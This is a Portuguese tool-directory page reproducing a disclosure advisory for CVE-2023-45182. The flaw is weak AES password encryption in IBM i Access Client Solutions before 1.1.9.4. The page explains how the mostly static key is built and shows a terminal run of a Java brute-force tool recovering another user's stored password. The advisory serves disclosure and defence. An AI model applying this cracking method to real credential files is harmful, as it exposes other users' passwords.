Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-45182 — IBM i Access Client Solutions < 1.1.9.4 - Criptografia fraca de senha | Kitploit
Ferramentas/GitHubGitHub/afine-com/cve-2023-45182
Quebra de SenhasFerramentas de Criptografia/DescriptografiaAnálise de VulnerabilidadesExploraçãoCriptografia
GitHubafine-com/cve-2023-45182

CVE-2023-45182

IBM i Access Client Solutions < 1.1.9.4 - Criptografia fraca de senha

Ver Repositório
há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2023-45182

IBM i Access Client Solutions < 1.1.9.4 - Criptografia de senha fraca

Linha do tempo

  • Vulnerabilidade reportada ao fornecedor: 22.09.2023
  • Nova versão corrigida 1.1.9.4 lançada: 08.12.2023
  • Divulgação pública: 15.12.2023

Descrição

O IBM i Access Client Solutions, para armazenar senhas de usuários, usa o algoritmo AES, porém a chave de criptografia de 16 bytes é a combinação de uma string estática (Thanatos) e caracteres aleatórios de uma string que consiste em outra string estática (Behemoth) combinada com o nome de usuário, a pasta pessoal do usuário, o SO (por exemplo Linux) combinado com o diretório atual em que o aplicativo foi iniciado. Como resultado, metade da chave de criptografia é estática (string Thanatos), enquanto a segunda metade é muito limitada. Isso torna muito fácil para um atacante forçar a senha por brute force até mesmo em um único núcleo de CPU.

Aqui está um exemplo de descriptografia de senha do usuário mmajchrowicz usando o script as400_password_bruteforce_tool.java a partir da conta mkubiak:

root@kitploit:~
┌──(mkubiak㉿localhost)-[/tmp/mkubiak]
└─$ java as400_password_bruteforce_tool.java mmajchrowicz_funciton_admin_work.bin Linux mmajchrowicz /opt

IBM AS400 Password Bruteforce Tool v0.3 by Michał Majchrowicz AFINE Team

Full keyspace: mmajchrowiczLinux/opt/home/mmajchrowiczBehemoth
Full keyspace length: 47

Reduced keyspace: BmajchrowizLnux/pte
Reduced keyspace length: 19

Found good pass: Thanatosaun/Lcmo

Encrypted system password 7 bytes:
2E 1B 10 0A 1B 0D 0A
Decrypted system password 7 bytes:
50 65 6E 74 65 73 74

Decrypted system password: Pentest

Este problema foi causado pelo uso de criptografia de senha fraca. Este problema foi corrigido no IBM i Access Client Solutions 1.1.9.4.

Versões afetadas

< 1.1.9.4

Aviso

Atualize o IBM i Access Client Solutions para 1.1.9.4 ou mais recente.

Referências

  • https://www.ibm.com/support/pages/node/7091942
  • https://nvd.nist.gov/vuln/detail/CVE-2023-45182
Baixar ferramenta